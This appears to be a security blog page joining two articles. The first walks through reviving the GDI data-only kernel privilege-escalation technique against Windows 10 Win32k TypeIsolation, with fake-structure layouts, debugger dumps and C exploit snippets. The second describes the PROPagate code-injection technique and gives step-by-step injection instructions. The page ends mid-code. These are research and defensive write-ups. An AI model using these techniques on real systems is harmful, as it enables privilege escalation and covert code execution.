Save and Reborn GDI data-only attack from Win32k TypeIsolation

1 Background

In recent years, the exploit of GDI objects to complete arbitrary memory address R/W in kernel exploitation has become more and more useful. In many types of vulnerabilityes such as pool overflow, arbitrary writes, and out-of-bound write, use after free and double free, you can use GDI objects to read and write arbitrary memory. We call this GDI data-only attack.

Microsoft introduced the win32k type isolation after the Windows 10 build 1709 release to mitigate GDI data-only attack in kernel exploitation. I discovered a mistake in Win32k TypeIsolation when I reverse win32kbase.sys. It have resulted GDI data-only attack worked again in certain common vulnerabilities. In this paper, I will share this new attack scenario.

Debug environment:

OS:

Windows 10 rs3 16299.371

FILE:

Win32kbase.sys 10.0.16299.371

2 GDI data-only attack

GDI data-only attack is one of the common methods which used in kernel exploitation. Modify GDI object member-variables by common vulnerabilities, you can use the GDI API in win32k to complete arbitrary memory read and write. At present, two GDI objects commonly used in GDI data-only attacks are Bitmap and Palette. An important structure of Bitmap is:


Typedef struct _SURFOBJ {

DHSURF dhsurf;

HSURF hsurf;

DHPDEV dhpdev;

HDEV hdev;

SIZEL sizlBitmap;

ULONG cjBits;

PVOID pvBits;

PVOID pvScan0;

LONG lDelta;

ULONG iUniq;

ULONG iBitmapFormat;

USHORT iType;

USHORT fjBitmap;

} SURFOBJ, *PSURFOBJ;

An important structure of Palette is:


Typedef struct _PALETTE64

{

BASEOBJECT64 BaseObject;

FLONG flPal;

ULONG32 cEntries;

ULONG32 ulTime;

HDC hdcHead;

ULONG64 hSelected;

ULONG64 cRefhpal;

ULONG64 cRefRegular;

ULONG64 ptransFore;

ULONG64 ptransCurrent;

ULONG64 ptransOld;

ULONG32 unk_038;

ULONG64 pfnGetNearest;

ULONG64 pfnGetMatch;

ULONG64 ulRGBTime;

ULONG64 pRGBXlate;

PALETTEENTRY *pFirstColor;

Struct _PALETTE *ppalThis;

PALETTEENTRY apalColors[3];

}

In the kernel structure of Bitmap and Palette, two important member-variables related to GDI data-only attack are Bitmap->pvScan0 and Palette->pFirstColor. Two member-variables point to Bitmap and Palette’s data field, and you can read or write data from data field through the GDI APIs. As long as we modify two member-variables to any memory address by triggering a vulnerability, we can use GetBitmapBits/SetBitmapBits or GetPaletteEntries/SetPaletteEntries to read and write arbitrary memory address.

About using the Bitmap and Palette to complete the GDI data-only attack Now that there are many related technical papers on the Internet, and it is not the focus of this paper, there will be no more deeply sharing. The relevant information can refer to the fifth part.

3 Win32k TypeIsolation

The exploit of GDI data-only attack greatly reduces the difficulty of kernel exploitation and can be used in most common types of vulnerabilities. Microsoft has added a new mitigation after Windows 10 rs3 build 1709 —- Win32k Typeisolation, which manages the GDI objects through a doubly-linked list, and separates the head of the GDI object from the data field. This is not only mitigate the exploit of pool fengshui which create a predictable pool and uses a GDI object to occupy the pool hole and modify member-variables by vulnerabilities. but also mitigate attack scenario which modifies other member-variables of GDI object header to increase the controllable range of the data field, because the head and data field is no longer adjacent.

About win32k typeisolation mechanism can refer to the following figure:

Here I will explain the important parts of the mechanism of win32k typeisolation. The detailed operation mechanism of win32k typeisolation, including the allocation, and release of GDI object, can be referred to in the fifth part.

In win32k typeisolation, GDI object is managed uniformly through the CSectionEntry doubly linked list. The view field points to a 0x28000 memory space, and the head of the GDI object is managed here. The view field is managed by view array, and the array size is 0x1000. When assigning to a GDI object, RTL_BITMAP is used as an important basis for assigning a GDI object to a specified view field.

In CSectionEntry, bitmap_allocator points to CSectionBitmapAllocator, and xored_view, xor_key, xored_rtl_bitmap are stored in CSectionBitmapAllocator, where xored_view ^ xor_key points to the view field and xored_rtl_btimap ^ xor_key points to RTL_BITMAP.

In RTL_BITMAP, bitmap_buffer_ptr points to BitmapBuffer,and BitmapBuffer is used to record the status of the view field, which is 0 for idle and 1 for in use. When applying for a GDI object, it starts traversing the CSectionEntry list through win32kbase!gpTypeIsolation and checks whether the current view field contains a free memory by CSectionBitmapAllocator. If there is a free memory, a new GDI object header will be placed in the view field.

I did some research in the reverse engineering of the implementation of GDI object allocation and release about the CTypeIsolation class and the CSectionEntry class, and then I found a mistake. TypeIsolation traverses the CSectionEntry doubly linked list, uses the CSectionBitmapAllocator to determine the state of the view field, and manages the GDI object SURFACE which stored in the view field, but does not check the validity of CSectionEntry->view and CSectionEntry->bitmap_allocator pointers, that is to say if we can construct a fake view and fake bitmap_allocator, and we can use the vulnerability to modify CSectionEntry->view and CSectionEntry->bitmap_allocator to point to fake struct, we can re-use GDI object to complete the data-only attack.

4 Save and reborn gdi data-only attack!

In this section, I would like to share the idea of ​​this attack scenario. HEVD is a practice driver developed by Hacksysteam that has typical kernel vulnerabilities. There is an Arbitrary Write vulnerability in HEVD. We use this vulnerability as example to share my attack scenario.

Attack scenario:

First look at the allocation of CSectionEntry, CSectionEntry will allocate 0x40 size session paged pool, CSectionEntry allocate pool memory implementation in NSInstrumentation::CSectionEntry::Create().


.text:00000001C002AC8A mov edx, 20h ; NumberOfBytes

.text:00000001C002AC8F mov r8d, 6F736955h ; Tag

.text:00000001C002AC95 lea ecx, [rdx+1] ; PoolType

.text:00000001C002AC98 call cs:__imp_ExAllocatePoolWithTag //Allocate 0x40 session paged pool

In other words, we can still use the pool fengshui to create a predictable session paged pool hole and it will be occupied with CSectionEntry. Therefore, in the exploit scenario of HEVD Arbitrary write, we use the tagWND to create a stable pool hole. , and use the HMValidateHandle to leak tagWND kernel object address. Because the current vulnerability instance is an arbitrary write vulnerability, if we can reveal the address of the kernel object, it will facilitate our understanding of this attack scenario, of course, in many attack scenarios, we only need to use pool fengshui to create a predictable pool.


Kd> g//make a stable pool hole by using tagWND

Break instruction exception - code 80000003 (first chance)

0033:00007ff6`89a61829 cc int 3

Kd> p

0033:00007ff6`89a6182a 488b842410010000 mov rax,qword ptr [rsp+110h]

Kd> p

0033:00007ff6`89a61832 4839842400010000 cmp qword ptr [rsp+100h],rax

Kd> r rax

Rax=ffff862e827ca220

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free ) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Ustx Process: ffffd40acb28c580

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8```

0xffff862e827ca220 is a stable session paged pool hole, and 0xffff862e827ca220 will be released later, in a free state.


Kd> p

0033:00007ff7`abc21787 488b842498000000 mov rax,qword ptr [rsp+98h]

Kd> p

0033:00007ff7`abc2178f 48398424a0000000 cmp qword ptr [rsp+0A0h],rax

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Free ) *Ustx

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8

Now we need to create the CSecitionEntry to occupy 0xffff862e827ca220. This requires the use of a feature of TypeIsolation. As mentioned in the second section, when the GDI object is requested, it will traverse the CSectionEntry and determine whether there is any free in the view field, if the view field of the CSectionEntry is full, the traversal will continue to the next CSectionEntry, but if CTypeIsolation doubly linked list, all the view fields of the CSectionEntrys are full, then NSInstrumentation::CSectionEntry::Create is invoked to create a new CSectionEntry.

Therefore, we allocate a large number of GDI objects after we have finished creating the pool hole to fill up all the CSectionEntry’s view fields to ensure that a new CSectionEntry is created and occupy a pool hole of size 0x40.


Kd> g//create a large number of GDI objects, 0xffff862e827ca220 is occupied by CSectionEntry

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Uiso

Pooltag Uiso : USERTAG_ISOHEAP, Binary : win32k!TypeIsolation::Create

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8 ffff86b442563150 size:

Next we need to construct the fake CSectionEntry->view and fake CSectionEntry->bitmap_allocator and use the Arbitrary Write to modify the member-variable pointer in the CSectionEntry in the session paged pool hole to point to the fake struct we constructed.

The view field of the new CSectionEntry that was created when we allocate a large number of GDI objects may already be full or partially full by SURFACEs. If we construct the fake struct to construct the view field as empty, then we can deceive TypeIsolation that GDI object will place SURFACE in a known location.

We use VirtualAllocEx to allocate the memory in the userspace to store the fake struct, and we set the userspace memory property to READWRITE.


Kd> dq 1e0000//fake pushlock

00000000`001e0000 00000000`00000000 00000000`0000006c

Kd> dq 1f0000//fake view

00000000`001f0000 00000000`00000000 00000000`00000000

00000000`001f0010 00000000`00000000 00000000`00000000

Kd> dq 190000//fake RTL_BITMAP

00000000`00190000 00000000`000000f0 00000000`00190010

00000000`00190010 00000000`00000000 00000000`00000000

Kd> dq 1c0000//fake CSectionBitmapAllocator

00000000`001c0000 00000000`001e0000 deadbeef`deb2b33f

00000000`001c0010 deadbeef`deadb33f deadbeef`deb4b33f

00000000`001c0020 00000001`00000001 00000001`00000000

Among them, 0x1f0000 points to the view field, 0x1c0000 points to CSectionBitmapAllocator, and the fake view field is used to store the GDI object. The structure of CSectionBitmapAllocator needs thoughtful construction because we need to use it to deceive the typeisolation that the CSectionEntry we control is a free view item.


Typedef struct _CSECTIONBITMAPALLOCATOR {

PVOID pushlock; // + 0x00

ULONG64 xored_view; // + 0x08

ULONG64 xor_key; // + 0x10

ULONG64 xored_rtl_bitmap; // + 0x18

ULONG bitmap_hint_index; // + 0x20

ULONG num_commited_views; // + 0x24

} CSECTIONBITMAPALLOCATOR, *PCSECTIONBITMAPALLOCATOR;

The above CSectionBitmapAllocator structure compares with 0x1c0000 structure, and I defined xor_key as 0xdeadbeefdeadb33f, as long as the xor_key ^ xor_view and xor_key ^ xor_rtl_bitmap operation point to the view field and RTL_BITMAP. In the debugging I found that the pushlock must point to a valid structure pointer, otherwise it will trigger BUGCHECK, so I allocate memory 0x1e0000 to store pushlock content.

As described in the second section, bitmap_hint_index is used as a condition to quickly index in the RTL_BITMAP, so this value also needs to be set to 0x00 to indicate the index in RTL_BITMAP. In the same way we look at the structure of RTL_BITMAP.


Typedef struct _RTL_BITMAP {

ULONG64 size; // + 0x00

PVOID bitmap_buffer; // + 0x08

} RTL_BITMAP, *PRTL_BITMAP;

Kd> dyb fffff322401b90b0

76543210 76543210 76543210 76543210

-------- -------- -------- --------

Fffff322`401b90b0 11110000 00000000 00000000 00000000 f0 00 00 00

Fffff322`401b90b4 00000000 00000000 00000000 00000000 00 00 00 00

Fffff322`401b90b8 11000000 10010000 00011011 01000000 c0 90 1b 40

Fffff322`401b90bc 00100010 11110011 11111111 11111111 22 f3 ff ff

Fffff322`401b90c0 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c4 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c8 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90cc 11111111 11111111 11111111 11111111 ff ff ff ff

Kd> dq fffff322401b90b0

Fffff322`401b90b0 00000000`000000f0 fffff322`401b90c0//ptr to rtl_bitmap buffer

Fffff322`401b90c0 ffffffff`ffffffff ffffffff`ffffffff

Fffff322`401b90d0 ffffffff`ffffffff

Here I select a valid RTL_BITMAP as a template, where the first member-variable represents the RTL_BITMAP size, the second member-variable points to the bitmap_buffer, and the immediately adjacent bitmap_buffer represents the state of the view field in bits. To deceive typeisolation, we will all of them are set to 0, indicating that the view field of the current CSectionEntry item is all idle, referring to the 0x190000 fake RTL_BITMAP structure.

Next, we only need to modify the CSectionEntry view and CSectionBitmapAllocator pointer through the HEVD’s Arbitrary write vulnerability.


Kd> dq ffff862e827ca220//before trigger

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 ffff862e`84780000

Ffff862e`827ca240 ffff862e`827f33c0 00000000`00000000

Kd> g / / trigger vulnerability, CSectionEntry-> view and CSectionEntry-> bitmap_allocator is modified

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21e35 cc int 3

Kd> dq ffff862e827ca220

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 00000000`001f0000

Ffff862e`827ca240 00000000`001c0000 00000000`00000000

Next, we normally allocate a GDI object, call CreateBitmap to create a bitmap object, and then observe the state of the view field.


Kd> g

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21ec8 cc int 3

Kd> dq 1f0280

00000000`001f0280 00000000`00051a2e 00000000`00000000

00000000`001f0290 ffffd40a`cc9fd700 00000000`00000000

00000000`001f02a0 00000000`00051a2e 00000000`00000000

00000000`001f02b0 00000000`00000000 00000002`00000040

00000000`001f02c0 00000000`00000080 ffff862e`8277da30

00000000`001f02d0 ffff862e`8277da30 00003f02`00000040

00000000`001f02e0 00010000`00000003 00000000`00000000

00000000`001f02f0 00000000`04800200 00000000`00000000

You can see that the bitmap kernel object is placed in the fake view field. We can read the bitmap kernel object directly from the userspace. Next, we only need to directly modify the pvScan0 of the bitmap kernel object stored in the userspace, and then call the GetBitmapBits/SetBitmapBits to complete any memory address read and write.

Summarize the exploit process:

Fix for full exploit:

In the course of completing the exploit, I discovered that BSOD was generated some time, which greatly reduced the stability of the GDI data-only attack. For example,


Kd> !analyze -v

************************************************** *****************************

* *

* Bugcheck Analysis *

* *

************************************************** *****************************




SYSTEM_SERVICE_EXCEPTION (3b)

An exception happened while performing a system service routine.

Arguments:

Arg1: 00000000c0000005, Exception code that caused the bugcheck

Arg2: ffffd7d895bd9847, Address of the instruction which caused the bugcheck

Arg3: ffff8c8f89e98cf0, Address of the context record for the exception that caused the bugcheck

Arg4: 0000000000000000, zero.




Debugging Details:

------------------







OVERLAPPED_MODULE: Address regions for 'dxgmms1' and 'dump_storport.sys' overlap




EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - 0x%08lx




FAULTING_IP:

Win32kbase!NSInstrumentation::CTypeIsolation<163840,640>::AllocateType+47

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi]




CONTEXT: ffff8c8f89e98cf0 -- (.cxr 0xffff8c8f89e98cf0)

.cxr 0xffff8c8f89e98cf0

Rax=ffffdb0039e7c080 rbx=ffffd7a7424e4e00 rcx=ffffdb0039e7c080

Rdx=ffffd7a7424e4e00 rsi=00000000001e0000 rdi=ffffd7a740000660

Rip=ffffd7d895bd9847 rsp=ffff8c8f89e996e0 rbp=0000000000000000

R8=ffff8c8f89e996b8 r9=0000000000000001 r10=7ffffffffffffffc

R11=0000000000000027 r12=00000000000000ea r13=ffffd7a740000680

R14=ffffd7a7424dca70 r15=0000000000000027

Iopl=0 nv up ei pl nz na po nc

Cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206

Win32kbase!NSInstrumentation::CTypeIsolation<163840,640>::AllocateType+0x47:

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi] ds:002b:00000000`001e0000=????????????????

After many tracking, I discovered that the main reason for BSOD is that the fake struct we created when using VirtualAllocEx is located in the process space of our current process. This space is not shared by other processes, that is, if we modify the view field through a vulnerability. After the pointer to the CSectionBitmapAllocator, when other processes create the GDI object, it will also traverse the CSecitionEntry. When traversing to the CSectionEntry we modify through the vulnerability, it will generate BSoD because the address space of the process is invalid, so here I did my first fix when the vulnerability was triggered finish.


DWORD64 fix_bitmapbits1 = 0xffffffffffffffff;

DWORD64 fix_bitmapbits2 = 0xffffffffffff;

DWORD64 fix_number = 0x2800000000;

CopyMemory((void *)(fakertl_bitmap + 0x10), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x18), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x20), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x28), &fix_bitmapbits2, 0x8);

CopyMemory((void *)(fakeallocator + 0x20), &fix_number, 0x8);

In the first fix, I modified the bitmap_hint_index and the rtl_bitmap to deceive the typeisolation when traverse the CSectionEntry and think that the view field of the fake CSectionEntry is currently full and will skip this CSectionEntry.

We know that the current CSectionEntry has been modified by us, so even if we end the exploit exit process, the CSectionEntry will still be part of the CTypeIsolation doubly linked list, and when our process exits, The current process space allocated by VirtualAllocEx will be released. This will lead to a lot of unknown errors. We have already had the ability to read and write at any address. So I did my second fix.


ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress, (BYTE *)&CSectionNext, sizeof(DWORD64));

LogMessage(L_INFO, L"Current CSectionEntry->previous: 0x%p", CSePrevious);

LogMessage(L_INFO, L"Current CSectionEntry->next: 0x%p", CSectionNext);

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionNext + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionPrevious, (BYTE *)&CSectionNext, sizeof(DWORD64));

In the second fix, I obtained CSectionEntry->previous and CSectionEntry->next, which unlinks the current CSectionEntry so that when the GDI object allocates traversal CSectionEntry, it will  deal with fake CSectionEntry no longer.

After completing the two fixes, you can successfully use GDI data-only attack to complete any memory address read and write. Here, I directly obtained the SYSTEM permissions for the latest version of Windows10 rs3, but once again when the process completely exits, it triggers BSoD. After the analysis, I found that this BSoD is due to the unlink after, the GDI handle is still stored in the GDI handle table, then it will find the corresponding kernel object in CSectionEntry and free away, and we store the bitmap kernel object CSectionEntry has been unlink, Caused the occurrence of BSoD.

The problem occurs in NtGdiCloseProcess, which is responsible for releasing the GDI object of the current process. The call chain associated with SURFACE is as follows


0e ffff858c`8ef77300 ffff842e`52a57244 win32kbase!SURFACE::bDeleteSurface+0x7ef

0f ffff858c`8ef774d0 ffff842e`52a1303f win32kbase!SURFREF::bDeleteSurface+0x14

10 ffff858c`8ef77500 ffff842e`52a0cbef win32kbase!vCleanupSurfaces+0x87

11 ffff858c`8ef77530 ffff842e`52a0c804 win32kbase!NtGdiCloseProcess+0x11f

bDeleteSurface is responsible for releasing the SURFACE kernel object in the GDI handle table. We need to find the HBITMAP which stored in the fake view in the GDI handle table, and set it to 0x0. This will skip the subsequent free processing in bDeleteSurface. Then call HmgNextOwned to release the next GDI object. The key code for finding the location of HBITMAP in the GDI handle table is in HmgSharedLockCheck. The key code is as follows:


V4 = *(_QWORD *)(*(_QWORD *)(**(_QWORD **)(v10 + 24) + 8 *((unsigned __int64)(unsigned int)v6 >> 8)) + 16i64 * (unsigned __int8 )v6 + 8);

Here I have restored a complete calculation method to find the bitmap object:


*(*(*(*(*win32kbase!gpHandleManager+10)+8)+18)+(hbitmap&0xffff>>8)*8)+hbitmap&0xff*2*8

It is worth mentioning here is the need to leak the base address of win32kbase.sys, in the case of Low IL, we need vulnerability to leak info. And I use NtQuerySystemInformation in Medium IL to leak win32kbase.sys base address to calculate the gpHandleManager address, after Find the position of the target bitmap object in the GDI handle table in the fake view, and set it to 0x0. Finally complete the full exploit.

Now that the exploit of the kernel is getting harder and harder, a full exploitation often requires the support of other vulnerabilities, such as the info leak. Compared to the oob writes, uaf, double free, and write-what-where, the pool overflow is more complicated with this scenario, because it involves CSectionEntry->previous and CSectionEntry->next problems, but it is not impossible to use this scenario in pool overflow.

If you have any questions, welcome to discuss with me. Thank you!

5 Reference

https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/5A1F/DEFCON-25-5A1F-Demystifying-Kernel-Exploitation-By-Abusing-GDI-Objects.pdf

https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html

https://github.com/sam-b/windows_kernel_address_leaks

Реклама

New code injection trick named — PROPagate code injection technique

ROPagate code injection technique

@Hexacorn discussed in late 2017 a new code injection technique, which involves hooking existing callback functions in a Window subclass structure. Exploiting this legitimate functionality of windows for malicious purposes will not likely surprise some developers already familiar with hooking existing callback functions in a process. However, it’s still a relatively new technique for many to misuse for code injection, and we’ll likely see it used more and more in future.

For all the details on research conducted by Adam, I suggest the following posts.

 

PROPagate — a new code injection trick

|=======================================================|

Executing code inside a different process space is typically achieved via an injected DLL /system-wide hooks, sideloading, etc./, executing remote threads, APCs, intercepting and modifying the thread context of remote threads, etc. Then there is Gapz/Powerloader code injection (a.k.a. EWMI), AtomBombing, and mapping/unmapping trick with the NtClose patch.

There is one more.

Remember Shatter attacks?

I believe that Gapz trick was created as an attempt to bypass what has been mitigated by the User Interface Privilege Isolation (UIPI). Interestingly, there is actually more than one way to do it, and the trick that I am going to describe below is a much cleaner variant of it – it doesn’t even need any ROP.

There is a class of windows always present on the system that use window subclassing. Window subclassing is just a fancy name for hooking, because during the subclassing process an old window procedure is preserved while the new one is being assigned to the window. The new one then intercepts all the window messages, does whatever it has to do, and then calls the old one.

The ‘native’ window subclassing is done using the SetWindowSubclass API.

When a window is subclassed it gains a new property stored inside its internal structures and with a name depending on a version of comctl32.dll:

  • UxSubclassInfo – version 6.x
  • CC32SubclassInfo – version 5.x

Looking at properties of Windows Explorer child windows we can see that plenty of them use this particular subclassing property:

So do other Windows applications – pretty much any program that is leveraging standard windows controls can be of interest, including say… OllyDbg:When the SetWindowSubclass is called it is using SetProp API to set one of these two properties (UxSubclassInfo, or CC32SubclassInfo) to point to an area in memory where the old function pointer will be stored. When the new message routine is called, it will then call GetProp API for the given window and once its old procedure address is retrieved – it is executed.

Coming back for a moment to the aforementioned shattering attacks. We can’t use SetWindowLong or SetClassLong (or their newer SetWindowLongPtr and SetClassLongPtr alternatives) any longer to set the address of the window procedure for windows belonging to the other processes (via GWL_WNDPROC or GCL_WNDPROC). However, the SetProp function is not affected by this limitation. When it comes to the process at the lower of equal  integrity level the Microsoft documentation says:

SetProp is subject to the restrictions of User Interface Privilege Isolation (UIPI). A process can only call this function on a window belonging to a process of lesser or equal integrity level. When UIPI blocks property changes, GetLastError will return 5.

So, if we talk about other user applications in the same session – there is plenty of them and we can modify their windows’ properties freely!

I guess you know by now where it is heading:

  • We can freely modify the property of a window belonging to another process.
  • We also know some properties point to memory region that store an old address of a procedure of the subclassed window.
  • The routine that address points to will be at some stage executed.

All we need is a structure that UxSubclassInfo/CC32SubclassInfo properties are using. This is actually pretty easy – you can check what SetProp is doing for these subclassed windows. You will quickly realize that the old procedure is stored at the offset 0x14 from the beginning of that memory region (the structure is a bit more complex as it may contain a number of callbacks, but the first one is at 0x14).

So, injecting a small buffer into a target process, ensuring the expected structure is properly filled-in and and pointing to the payload and then changing the respective window property will ensure the payload is executed next time the message is received by the window (this can be enforced by sending a message).

When I discovered it, I wrote a quick & dirty POC that enumerates all windows with the aforementioned properties (there is lots of them so pretty much every GUI application is affected). For each subclassing property found I changed it to a random value – as a result Windows Explorer, Total Commander, Process Hacker, Ollydbg, and a few more applications crashed immediately. That was a good sign. I then created a very small shellcode that shows a Message Box on a desktop window and tested it on Windows 10 (under normal account).

The moment when the shellcode is being called in a first random target (here, Total Commander):

Of course, it also works in Windows Explorer, this is how it looks like when executed:


If we check with Process Explorer, we can see the window belongs to explorer.exe:Testing it on a good ol’ Windows XP and injecting the shellcode into Windows Explorer shows a nice cascade of executed shellcodes for each window exposing the subclassing property (in terms of special effects XP always beats Windows 10 – the latter freezes after first messagebox shows up; and in case you are wondering why it freezes – it’s because my shellcode is simple and once executed it is basically damaging the running application):

For obvious reasons I won’t be attaching the source code.

If you are an EDR or sandboxing vendor you should consider monitoring SetProp/SetWindowSubclass APIs as well as their NT alternatives and system services.

And…

This is not the end. There are many other generic properties that can be potentially leveraged in a very same way:

  • The Microsoft Foundation Class Library (MFC) uses ‘AfxOldWndProc423’ property to subclass its windows
  • ControlOfs[HEX] – properties associated with Delphi applications reference in-memory Visual Component Library (VCL) objects
  • New windows framework e.g. Microsoft.Windows.WindowFactory.* needs more research
  • A number of custom controls use ‘subclass’ and I bet they can be modified in a similar way
  • Some properties expose COM/OLE Interfaces e.g. OleDropTargetInterface

If you are curious if it works between 32- and 64- bit processes

|=======================================================|

 

PROPagate follow-up — Some more Shattering Attack Potentials

|=======================================================|

We now know that one can use SetProp to execute a shellcode inside 32- and 64-bit applications as long as they use windows that are subclassed.

=========================================================

A new trick that allows to execute code in other processes without using remote threads, APC, etc. While describing it, I focused only on 32-bit architecture. One may wonder whether there is a way for it to work on 64-bit systems and even more interestingly – whether there is a possibility to inject/run code between 32- and 64- bit processes.

To test it, I checked my 32-bit code injector on a 64-bit box. It crashed my 64-bit Explorer.exe process in no time.

So, yes, we can change properties of windows belonging to 64-bit processes from a 32-bit process! And yes, you can swap the subclass properties I described previously to point to your injected buffer and eventually make the payload execute! The reason it works is that original property addresses are stored in lower 32-bit of the 64-bit offset. Replacing that lower 32-bit part of the offset to point to a newly allocated buffer (also in lower area of the memory, thanks to VirtualAllocEx) is enough to trigger the code execution.

See below the GetProp inside explorer.exe retrieving the subclassed property:

So, there you have it… 32 process injecting into 64-bit process and executing the payload w/o heaven’s gate or using other undocumented tricks.

The below is the moment the 64-bit shellcode is executed:

p.s. the structure of the subclassed callbacks is slightly different inside 64-bit processes due to 64-bit offsets, but again, I don’t want to make it any easier to bad guys than it should be 🙂

=========================================================

There are more possibilities.

While SetWindowLong/SetWindowLongPtr/SetClassLong/SetClassLongPtr are all protected and can be only used on windows belonging to the same process, the very old APIs SetWindowWord and SetClassWord … are not.

As usual, I tested it enumerating windows running a 32-bit application on a 64-bit system and setting properties to unpredictable values and observing what happens.

It turns out that again, pretty much all my Window applications crashed on Window 10. These 16 bits seem to be quite powerful…

I am not a vulnerability researcher, but I bet we can still do something interesting; I will continue poking around. The easy wins I see are similar to SetProp e.g. GWL_USERDATA may point to some virtual tables/pointers; the DWL_USER – as per Microsoft – ‘sets new extra information that is private to the application, such as handles or pointers’. Assuming that we may only modify 16 bit of e.g. some offset, redirecting it to some code cave or overwriting unused part of memory within close proximity of the original offset could allow for a successful exploit.

|=======================================================|

 

PROPagate follow-up #2 — Some more Shattering Attack Potentials

|=======================================================|

A few months back I discovered a new code injection technique that I named PROPagate. Using a subclass of a well-known shatter attack one can modify the callback function pointers inside other processes by using Windows APIs like SetProp, and potentially others. After pointing out a few ideas I put it on a back burner for a while, but I knew I will want to explore some more possibilities in the future.

In particular, I was curious what are the chances one could force the remote process to indirectly call the ‘prohibited’ functions like SetWindowLong, SetClassLong (or their newer alternatives SetWindowLongPtr and SetClassLongPtr), but with the arguments that we control (i.e. from a remote process). These API are ‘prohibited’ because they can only be called in a context of a process that owns them, so we can’t directly call them and target windows that belong to other processes.

It turns out his may be possible!

If there is one common way of using the SetWindowLong API it is to set up pointers, and/or filling-in window-specific memory areas (allocated per window instance) with some values that are initialized immediately after the window is created. The same thing happens when the window is destroyed – during the latter these memory areas are usually freed and set to zeroes, and callbacks are discarded.

These two actions are associated with two very specific window messages:

  • WM_NCCREATE
  • WM_NCDESTROY

In fact, many ‘native’ windows kick off their existence by setting some callbacks in their message handling routines during processing of these two messages.

With that in mind, I started looking at existing processes and got some interesting findings. Here is a snippet of a routine I found inside Windows Explorer that could be potentially abused by a remote process:

Or, it’s disassembly equivalent (in response to WM_NCCREATE message):

So… since we can still freely send messages between windows it would seem that there is a lot of things that can be done here. One could send a specially crafted WM_NCCREATE message to a window that owns this routine and achieve a controlled code execution inside another process (the lParam needs to pass the checks and include pointer to memory area that includes a callback that will be executed afterwards – this callback could point to malicious code). I may be of course wrong, but need to explore it further when I find more time.

The other interesting thing I noticed is that some existing windows procedures are already written in a way that makes it harder to exploit this issue. They check if the window-specific data was set, and only if it was NOT they allow to call the SetWindowLong function. That is, they avoid executing the same initialization code twice.

|=======================================================|

 

No Proof of Concept?

Let’s be honest with ourselves, most of the “good” code injection techniques used by malware authors today are the brainchild of some expert(s) in the field of computer security. Take for example Process HollowingAtomBombing and the more recent Doppelganging technique.

On the likelihood of code being misused, Adam didn’t publish a PoC, but there’s still sufficient information available in the blog posts for a competent person to write their own proof of concept, and it’s only a matter of time before it’s used in the wild anyway.

Update: After publishing this, I discovered it’s currently being used by SmokeLoader but using a different approach to mine by using SetPropA/SetPropW to update the subclass procedure.

I’m not providing source code here either, but given the level of detail, it should be relatively easy to implement your own.

Steps to PROPagate.

  1. Enumerate all window handles and the properties associated with them using EnumProps/EnumPropsEx
  2. Use GetProp API to retrieve information about hWnd parameter passed to WinPropProc callback function. Use “UxSubclassInfo” or “CC32SubclassInfo” as the 2nd parameter.
    The first class is for systems since XP while the latter is for Windows 2000.
  3. Open the process that owns the subclass and read the structures that contain callback functions. Use GetWindowThreadProcessId to obtain process id for window handle.
  4. Write a payload into the remote process using the usual methods.
  5. Replace the subclass procedure with pointer to payload in memory.
  6. Write the structures back to remote process.

At this point, we can wait for user to trigger payload when they activate the process window, or trigger the payload via another API.

Subclass callback and structures

Microsoft was kind enough to document the subclass procedure, but unfortunately not the internal structures used to store information about a subclass, so you won’t find them on MSDN or even in sources for WINE or ReactOS.

typedef LRESULT (CALLBACK *SUBCLASSPROC)(
   HWND      hWnd,
   UINT      uMsg,
   WPARAM    wParam,
   LPARAM    lParam,
